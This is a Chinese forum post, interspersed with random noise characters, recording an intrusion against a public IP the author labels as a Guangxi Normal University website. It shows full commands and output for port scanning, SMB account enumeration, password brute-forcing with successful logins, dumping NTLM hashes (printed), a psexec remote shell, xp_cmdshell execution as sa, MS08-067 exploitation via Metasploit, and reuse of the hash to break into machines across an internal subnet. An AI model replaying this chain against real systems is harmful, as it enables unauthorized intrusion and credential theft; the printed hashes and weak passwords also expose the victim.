广西师范网站http://202.103.242.241/; S( }: X% p Q) S4 O; w
' D; |8 G3 ~4 ?& o9 Z2 [' T: Lroot@bt:~# nmap -sS -sV 202.103.242.241; n( n) b5 h: G0 s) S! K7 z
( s" k4 C/ D/ _9 u4 J# c6 M
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
# {4 X" g( C [: [- `0 B
% U# V( N) @7 k# Z2 _ x4 @+ ]Nmap scan report for bogon (202.103.242.241)7 w1 E5 t- M1 y
8 M8 U- n) q6 u" t9 e# f
Host is up (0.00048s latency).' q4 X; \8 u% m
% q& E6 h% Q7 f) k
Not shown: 993 closed ports3 @1 P: }' O' q, R) [' j( C5 h, ~" q
6 d5 u! c, G' l/ P5 b8 nPORT STATE SERVICE VERSION
0 m d3 N% Z8 ^( O- p9 R7 b8 E( j( M: z3 H. w* R
135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
3 ], H; R; K6 l3 E1 o! V
$ ^8 R; ~! x' h3 w; q* w139/tcp open netbios-ssn2 N! R: I2 X4 d2 P7 X6 {- j3 S2 {
8 \6 K) J7 J. x
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
# n1 E0 [: S4 ] s9 Z0 @0 }3 U- p
1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)) D, b: m0 |! o5 S
1 [2 s7 w) S* @4 Z, ^4 J
1026/tcp open msrpc Microsoft Windows RPC
0 F- F4 Y: C' y/ Y. T/ p
8 @. a, i& V" T; [) S) }3372/tcp open msdtc?; n, }" u4 h# }. ?1 |! W: \
! o9 l# Q" T" R& @( U3 t% B: o t3389/tcp open ms-term-serv?3 x# Y0 V5 x/ H/ i! P) U
: e+ ^5 }/ d5 P" _
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
4 _* I5 A, P/ `9 `9 P3 O ZSF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
( `* u/ Y1 F6 w) j+ ]$ x& j B, T0 Y Q8 k! ?6 u
SF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions- u: H x' \# z3 Y! m: t
" Z$ D! k, |/ R* Q( aSF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)
* G0 z& D% S: B p. T" E) o" J
5 B$ Z9 U! s7 s0 k2 W0 _SF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO
& i5 u0 a0 z' r) t) ?' ~) k% a
5 i7 y3 U- c) u2 z" wSF:ptions,6,”hO\n\x000Z”);2 g+ y9 c$ F9 X. X( r* k
' m; L. }7 Z5 `" e3 fMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)3 N* i c! b: r/ m7 j. X( \
- T7 U) w, P! X" l0 s2 A8 I9 U, G sService Info: OS: Windows4 n4 w& `& C- U2 @! b5 Q( Q4 @
( R; Y" K j% XService detection performed. Please report any incorrect results at http://nmap.org/submit/ .# K8 r' f1 o# n! O0 s( [
4 s) F4 w; t* |3 Q+ x; W1 v! }* Y
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
& z& b6 i) ]# i$ t: W" r* a( P8 a* \2 W# q8 M/ l
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本
H0 H. ? l5 i# D; \, E) w5 K
) P0 j) z: c* K8 Y. [0 N-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse/ e4 \- \2 E* K/ O
9 S$ e, u% z6 q# R0 S& o
-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse2 ^3 v2 a8 M8 _$ M5 K
! E2 o" W6 M+ N7 P* E* X Q9 i
-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse& w* k5 @! I% [7 `0 L
( i$ _8 g1 a S
-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse. I, p- |, d+ |8 N9 H) I' p1 O1 x1 s
# Q" s2 h: M+ P# I y" k. \-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse3 L; m. R; D- T. q3 \( q4 V' x
[& s8 @" v5 U-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
3 t$ B2 E: ]+ L0 U. e" \
( [, j6 j/ S7 q0 G( T& g0 ?-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse# s t: X6 n: S
, ?$ I$ N- }3 V- v* l
-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse/ u" a0 e' G. @# T
+ g$ h. U! Z$ f0 N-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse; n: m* u: T' ~9 b
) q* \. [3 d4 P" ^4 G-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse/ p( b" I+ G! d" ?
( K8 K- Y- M2 K# Q! f) \
-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse/ a( ~4 t# M4 [% P% Z8 X% l
" Q8 ^0 }+ d! e, s5 R6 [. w
-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse
- C6 ]! x8 g( k6 @5 D/ _3 }& v2 r+ C; I; ~! o5 E1 s
-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse+ R# d' _! t4 |
; d$ u! V8 O) p* j2 A-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
( `% R8 g0 m3 B5 x6 ~0 N4 E% t( U( j" m
-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse
0 K5 N+ G, C/ O! H2 j) J9 v1 P
* w5 n9 |% H1 P+ e' }- Groot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241 ) l4 c$ B% z0 F: h3 E
0 B9 c+ y. j0 O8 K2 y# a//此乃使用脚本扫描远程机器所存在的账户名$ Z$ k& X4 L6 M8 Q4 n
3 l1 v9 X! n: @( {Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
! p3 G6 _$ `7 [1 @& F. |8 ^ h. t
# u& c1 n/ A, f( v; xNmap scan report for bogon (202.103.242.241)
2 W- @: P. S+ C" T- P* S5 P- b2 v! b
$ |* F" L3 B& z$ {& q5 x- zHost is up (0.00038s latency).+ X. B0 h, U9 M) D
" I& f6 J' Z. Y8 u
Not shown: 993 closed ports
$ y2 j, j* s% l4 v( a6 S" S; p( |; W2 b3 s( u4 B! N5 |/ }
PORT STATE SERVICE& s# q9 @; h6 ]8 c
( r7 v3 Q# b; ]9 h& ^6 M135/tcp open msrpc9 a4 U4 b! ?, [: a) G$ V) R
: N$ _$ S( Q4 F# U8 v$ t( k- I
139/tcp open netbios-ssn
5 j+ P( ~ N: I( u( g& V# e6 U" q% Q
445/tcp open microsoft-ds7 T$ K8 n7 j( K" q8 \
U5 { d! j* J% V5 I. v! E1025/tcp open NFS-or-IIS
6 B: v" @% r# E
7 h" y6 \4 J, O8 C% Z! ?8 g1026/tcp open LSA-or-nterm8 E6 s, Z4 {5 j2 j
4 b c2 e6 N; ?/ x
3372/tcp open msdtc
. Z+ }, o+ h2 M/ S1 l" [& U: v3 e7 Z- t
3389/tcp open ms-term-serv3 H: O/ N; Y) R
; o$ }8 e, F3 b d7 U
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)) f: R. b6 Y1 Y8 z, H% p2 c/ u7 Y
5 v6 T4 B Z+ h" G( s. a) q' z' yHost script results:) g6 m# A4 J, ^ c
! `5 q- q6 I" l% ^# p, ~; k
| smb-enum-users:
( S4 r' O/ B" X- ^
7 Q7 i( G6 k z6 a4 j# A|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果/ q/ S5 c" i* d+ S7 M% u
" Q v" n( m+ U6 B5 a# e B8 n% d# J
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds' v% u. O( Q9 L, Y: k" l2 J
$ J0 R+ p( v, G
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241 l: I% B! {+ r. G1 V/ R9 Q, ]6 I, I7 e
' l/ s( e% D) F
//查看共享, y; q& f5 N k2 k
# T1 h0 v& L0 }Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST% @/ U u+ t. n0 Q' G" b7 S$ M
) {5 l- t; B7 aNmap scan report for bogon (202.103.242.241)- @: `2 S$ ]) M' S8 c
! y* M; E A* jHost is up (0.00035s latency)./ O7 w5 e. G6 F+ z
) b' R3 \2 D3 V* E! aNot shown: 993 closed ports
& f7 G7 L" D5 ?5 T1 W$ C6 a% ]" ]$ q/ W9 D* ~" c
PORT STATE SERVICE
7 \4 i6 ?: P% ~2 \
: c' e. f5 W- V2 Q4 R, j3 E: Z( ^2 c( E135/tcp open msrpc
0 J: P8 }& J' C1 ]. ^) y* n5 a2 q' [7 b5 a; t, u5 S
139/tcp open netbios-ssn; U4 j9 z( U! K* d
7 A! C2 Q7 j. x5 @) e) w4 d445/tcp open microsoft-ds
0 O: [' N5 {) @9 ?5 k2 C, m/ S$ p# e! Q+ p* c. ^3 H' P
1025/tcp open NFS-or-IIS
) \0 H0 b9 V r& z
* D# ]8 l. L" l# |% N1026/tcp open LSA-or-nterm
8 u/ U6 ~6 x& @' I2 T$ i) {1 A. {% G! j6 x
3372/tcp open msdtc, b: m; J+ N( S' t- [5 P) q& m
Z# G E2 A+ U: n9 M7 a5 ?) R# j; j3389/tcp open ms-term-serv
+ t" r5 p0 x2 A" m( H
; ] p3 a3 u( s; C* DMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
8 U' v6 S4 o% _2 N& j
9 E0 N! c4 W$ Y/ r) ?. r. c; WHost script results:
0 ?" ?/ |1 A) D2 N
8 H& P& V n/ X% @| smb-enum-shares:
, |5 M0 ?% `$ Z! v" L$ H; M9 z. f# i5 n {( @. i; v
| ADMIN$, A( Y% I: X$ s7 l! m& I" e, u
7 N2 ^3 i% ]8 ?' L* _, j9 ~
| Anonymous access: <none>3 R" \! y( G' M. F& l5 I$ ?) j' a* \
5 p- W& r: m! M0 j) b# ^( j7 R4 b| C$: O D& a. z7 L8 c* n
: r: h+ H; A7 t n4 d2 \4 A5 u
| Anonymous access: <none>" `/ \( o# d( [ V' f) z) T
% I& k W% ], U0 K5 [; S| IPC$
' Y5 I" V- F9 Y9 O* y9 h& |6 o) H5 v/ J4 K2 `1 l
|_ Anonymous access: READ9 y l9 w" z! ?8 i! P
0 M. a( t) j0 f& S# K) U j
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds A+ Y, Z9 U: ~ H5 n6 I
' H" i/ Q5 `# q* V' c- j
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241
3 W5 s" ^6 @8 J& y+ ^# R
7 {% T j8 R; u5 e' ~5 M//获取用户密码
i2 \$ g# ^# z+ Y) P- Z z* d+ O
9 R% a( M9 o/ H# f; d- J" ?Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST4 h3 B( l s) v: K
/ U8 Z" `* m {0 G# o
Nmap scan report for bogon (202.103.242.2418)( C% t; |) K% |6 Q4 n) e) B
4 ^" A. h1 H$ V& O' c4 g N' [& F6 D V
Host is up (0.00041s latency).
" ?0 b/ Y- w! q& g* N5 y+ ]6 r5 r4 Z8 T' r% E/ `
Not shown: 993 closed ports" |) x' U. f( G. d5 h7 _1 i
) E! H: H3 {' {* q4 O* l2 s4 n% zPORT STATE SERVICE; O( X& W6 ?/ _; p' L2 \
3 L" ?! l. T, s& M8 L- N2 Q+ n3 D135/tcp open msrpc2 o. }& {( o* g/ L! E
1 Q5 W* o. v8 v139/tcp open netbios-ssn) Z+ a( J. i- F1 p+ k" D1 K
5 g7 l& n7 f: p9 |1 m) o( v6 n445/tcp open microsoft-ds0 ~; _) ~' a7 V! {' G3 `" U3 D
3 e* t: r) t( j+ s, S+ S7 s1025/tcp open NFS-or-IIS
8 U5 V( ?, Q7 ^5 W' U. W
2 j* Q3 a0 F# ]+ P2 G2 {' M1026/tcp open LSA-or-nterm9 J) e5 C4 B% t; |0 S
) d& l0 N( q/ g/ f* P# x
3372/tcp open msdtc: a# N7 W2 w5 T/ t ?( d
2 n. a/ I5 Y- i M- l3389/tcp open ms-term-serv, C1 x5 W. V" |, V
6 H" ^' X6 i- y- X3 M9 P4 P9 ^2 vMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)' f+ m0 j4 p! B, w& r% h5 M
8 B) ~# o t3 @* p/ C, G, c& t, bHost script results:. B: w5 Z& @! g% ]3 F, C5 P- }
$ ?+ b. p% {8 X: g3 q; N7 k| smb-brute:
& v3 |% |" \) _+ K" x! `) D
+ ~; W- C1 E) T; ?9 t0 k2 Gadministrator:<blank> => Login was successful
( f* _7 M1 d* \$ X* T+ C! Y6 n" a0 A: J) A% G! T: W6 D
|_ test:123456 => Login was successful/ }; m5 W/ o7 u2 D q. p
8 ?# [5 a( A. i, _/ Y
Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
% W0 |* R$ k! ^
[& t& N' v( a$ o# M( groot@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash
) o% P3 S) F% [, r" m) i" q* O) @( F6 S. \
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data; l( c# }- D6 _+ Q- I6 I! Z
5 v: Q2 f" W: a; H( C) H
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
8 U/ t; h8 ?* |, Y: A- v" {6 W0 v/ @9 F/ D& s
root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139
4 x, ~' E% h+ G: {3 V, D" N) K% r5 ?7 C
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST7 {; _: Q0 K0 y! X3 Y
6 S, p; G' |9 a. d+ v* c
Nmap scan report for bogon (202.103.242.241)
! P% ^1 `* T& v5 P1 `
4 F& i: |; {( g+ J1 K( M g! C3 ?8 Q4 RHost is up (0.0012s latency).0 s! u4 M! [2 ]. Z9 V# }/ Y' }! m
1 @- Q! c) Z. B- q) a! j( l# ~PORT STATE SERVICE
, s& T# p, E! S
% _. f1 ^9 e3 r; a8 H! k. T9 \/ P135/tcp open msrpc, X; o7 [# V" L ]$ z* I+ k5 @+ c
* h9 z1 ?2 o3 m139/tcp open netbios-ssn9 g# A/ r( x# O8 H6 G: i( i
$ Y9 {( M( G- h
445/tcp open microsoft-ds ]5 Z1 J! e- b0 H% r
8 i4 }& K% a3 C; m; YMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)6 k/ T7 e4 Q* P* j' o; P
3 k% j* o7 @. WHost script results:1 }, z3 B- F. y8 m7 s6 t
4 {" n% |6 |) M, ]: J- o
| smb-pwdump:$ X5 F3 ?, s5 H8 Y* e( O) K3 g
( s4 v4 `" R4 S$ B| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
3 @4 p8 ^+ f5 y( P! ^
8 a7 b8 f0 @2 w| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
* d( t( I. q' D2 f% b! H
* o' V' c' l* C1 P| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
. _/ y2 W0 T: X) H8 J9 g1 m+ X i) K, A: d" `7 G
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2# s7 {5 ^& o# e$ a4 p! `, _5 k
1 r# e# h$ o* B9 ]3 {Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds& r. J* d) T k) J) w
+ M/ v3 H; U6 Y7 Q! G
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell
& m3 E8 c0 h2 q$ r! H* ^- M* b
2 g2 M% n- ^% c2 g. q; G' j3 W-p 123456 -e cmd.exe
% o: ^6 Z1 S( j- L5 t
+ B5 `4 }" w: Z" \PsExec v1.55 – Execute processes remotely
4 t) |) [; a8 n" D/ C) c j: o" B* h0 z) D2 S
Copyright (C) 2001-2004 Mark Russinovich
2 `0 ~. h$ w7 l
4 @) ]$ M- j9 C* b! l7 l) QSysinternals – www.sysinternals.com
; w. C7 }. B; d- H3 u8 n! \4 s6 i
0 Q+ p9 k; f$ t7 F! H' G' \( |Microsoft Windows 2000 [Version 5.00.2195]" @$ n4 n; u; a9 r% N
V$ \$ F: Y) F3 D# I(C) 版权所有 1985-2000 Microsoft Corp.
?9 O/ {2 [' q# x
' c6 O2 ~% b! u; Q) ^0 c) uC:\WINNT\system32>ipconfig
2 p+ A3 g4 N# |- _$ J0 W7 S. m3 A$ e7 N) t
Windows 2000 IP Configuration
% T! E) [8 O, q& J3 l6 @8 |
* r2 L Z9 m K) [' z/ yEthernet adapter 本地连接:
, a3 k( P8 }# I* ?7 F2 d; r% J, K( h+ i
Connection-specific DNS Suffix . :
3 g& l/ Q# K. M, W+ L1 [' ]8 q6 g* d* J' y6 s' ~% [
IP Address. . . . . . . . . . . . : 202.103.242.241' T1 r3 n9 S1 G6 Q, e6 G
y0 o2 ^2 t6 L# ?+ G8 w4 K0 V
Subnet Mask . . . . . . . . . . . : 255.255.255.0
8 R# l; G; c }) C2 p- U- @' x( W6 L T2 j! j
Default Gateway . . . . . . . . . : 202.103.1.15 A8 N4 j3 J( V. |! Z; K
3 ~# s3 Y" k7 J
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令+ L* C/ J' _& @
3 A# M! I9 J# p* I' D
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞+ Z( S: R9 |: m1 G" O# s
8 S8 T; q, r# e" P M: DStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST9 u* W$ D2 w: Y
. L1 ]" \( ]. y% @' cNmap scan report for bogon (202.103.242.241)
) e, w4 H& u0 e' v
$ m; n, r. F! J9 Q8 U% m# q* o3 iHost is up (0.00046s latency).
' ` u- v4 c( O/ t9 R; q" D
% A1 T/ m+ l% ]. g! q! a& Q& n- ENot shown: 993 closed ports) e# W- }: l( i: ?
: u# M7 u; V0 u# T6 X
PORT STATE SERVICE9 Z) |. b2 X4 f i% O
; f3 W1 O' ~* i5 H% j, |2 j135/tcp open msrpc
. q# u) f5 A6 Q( z7 {: B, R
' W# B# T) U6 ~8 z0 j139/tcp open netbios-ssn' A0 q F! o1 q7 Y7 Q
5 V1 O& ?/ @. }3 [* g* a. {4 o" K; K# F
445/tcp open microsoft-ds0 T0 |- ^$ s3 W+ M6 C
8 Z+ Q6 ^1 y9 y, ]# h _5 H
1025/tcp open NFS-or-IIS( [7 k" Y! @1 h! Y) `& |7 ?
( e+ O: }0 a* t6 _1026/tcp open LSA-or-nterm
# W X# h3 b) r, L4 h O7 b/ x" {3 v ]+ g" k: J
3372/tcp open msdtc* K+ Q# I; @9 Q7 E8 i
/ l- U) h" [9 W i5 T3389/tcp open ms-term-serv& p! ^; T, l% T0 t
0 h; @! _* ~* E; eMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
. E. }% Y% N- y( |7 q& I; F) o. q3 I4 }$ R F$ L E
Host script results:( @; J9 I% J1 M: p+ f
6 M5 S/ m9 J6 |5 E* j9 [2 B
| smb-check-vulns:/ ?; T/ i9 f! Y9 z: Z! m
+ H0 H4 q9 [) e9 r+ X4 k* e|_ MS08-067: VULNERABLE: P+ _+ d4 t4 @5 N! \
% C- e" [4 b( i0 K# Y( m- r% `
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds0 }9 ?4 I$ e S2 `) |) J: [# Y
+ ?+ j8 ~' M$ [! F/ Y7 sroot@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出
1 V+ `1 O3 s3 \% h; v! |. A% o" J4 x5 W- n/ K$ x! r
msf > search ms08. E) I- q$ T$ c
! X; _% J$ }. ^/ y, L4 f
msf > use exploit/windows/smb/ms08_067_netapi. q' B: k& {& x: o. \
6 c0 T6 X6 f$ }& O9 i! Kmsf exploit(ms08_067_netapi) > show options8 N: y- L( t0 b2 ?, @' G; N& c" w5 i
3 N( L [% Z) B; Ymsf exploit(ms08_067_netapi) > set RHOST 202.103.242.241; e1 A; K% E5 n5 q( X7 C
9 M9 z& n: V( v; N6 A6 M- vmsf exploit(ms08_067_netapi) > show payloads
! ], C+ v" `3 x: V6 C; s: w+ V2 l; m+ D: W
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp+ Z* }* w* _) i# O- ]% Q$ m
5 D* P" `. e; Y# s8 ]2 T! _$ omsf exploit(ms08_067_netapi) > exploit
. n9 S/ i+ @3 h) m3 j
" H: k, B4 G7 [, m) }meterpreter >
% G! ?# j; `" [1 y8 I9 _( Z ?# c/ R' W( e1 d4 V
Background session 2? [y/N] (ctrl+z)
3 [* P# e6 ?! L) N& J
V$ t! p: ^6 L y/ dmsf exploit(ms08_067_netapi) > sessions -l
2 p8 M& j" ~1 P ?9 |8 z8 k7 W! Z" F
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt g M( ^" a) ^& L/ k
. n$ I3 Y% j' m% {/ J* U2 H
test' y$ [( f# N( R- ^2 O! ^
+ c' f; C4 w; o7 w
administrator
& l( U& E5 e. V, x$ o) f) q% l
+ x3 Y5 E, m ?. I. V, b broot@bt:/usr/local/share/nmap/scripts# vim password.txt+ o. Q1 j1 Q9 f
$ i: A$ u+ y2 H. k) }4 {
44EFCE164AB921CAAAD3B435B51404EE
! L/ }( a$ E) E( w( {- |% ^, L+ s$ J( z/ A) z2 ?8 ?
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
/ S+ J* S1 b) G9 N M1 [. c2 M+ \) z: `( G7 D, D. o# o2 {/ ^3 y
//利用用户名跟获取的hash尝试对整段内网进行登录
9 H; ?% R8 ]7 b: Q( N4 A
9 u! H4 J. q: j* }Nmap scan report for 192.168.1.105
8 i( L M, x4 K& l' \- i1 K
" [9 f( _" K8 B6 rHost is up (0.00088s latency). _0 Z0 B6 O8 |2 a
8 U1 A* m% }6 PNot shown: 993 closed ports/ ?- V( A6 L B# }/ f* m/ Q2 I3 M
1 ]4 K6 x) A, |2 ]/ m4 G! H% R
PORT STATE SERVICE
- O9 Z2 o% W% @3 h" \
9 F5 Y, K$ T- X3 a135/tcp open msrpc
' k9 R! z* l+ O) e. B1 R" n
0 R5 B. V, i1 J9 n _139/tcp open netbios-ssn
( o8 ?- M/ e1 y/ l, P5 |3 Y1 t3 W8 d' H7 y: h
445/tcp open microsoft-ds: ^ t! F# j! x" R5 i/ M. P/ }
, n5 X) l9 r+ p1 \1025/tcp open NFS-or-IIS
) ]6 C' J! @# S, V! ~
0 v' b$ V. W( c0 ]- }1026/tcp open LSA-or-nterm
; ~* q* B( e0 |$ x4 {+ S) q5 m6 \4 G2 E9 w/ d& Y* g( b) D) b
3372/tcp open msdtc
4 k) }5 r4 A* K6 A5 y! ^ I
$ R$ f8 I5 Z% K- ]% D3 `5 p3389/tcp open ms-term-serv5 h4 J; v! B' a6 \$ j/ A9 S
# A. R: Y- f- m8 V! tMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
% q. z, y# ?, m; z6 F3 q* \5 u+ T$ t. t3 R3 l0 Y' y
Host script results:
$ x3 U! i# H" A% P, t, \! R4 a. m
! d$ `: K$ A; | d/ Y6 V- ]| smb-brute:* J4 a! O3 S6 Z% z O0 |8 K* V
- C! F0 x& n1 z2 y3 I0 S|_ administrator:<blank> => Login was successful" O7 e% q: v( b# Z/ ^
& R- J b3 c7 Y% x+ k
攻击成功,一个简单的msf+nmap攻击~~·0 Y6 r2 U, S* M* k) r s
5 i( I/ Z. g+ A& m |
发表于 2012-12-4 12:46:42
收藏
支持
反对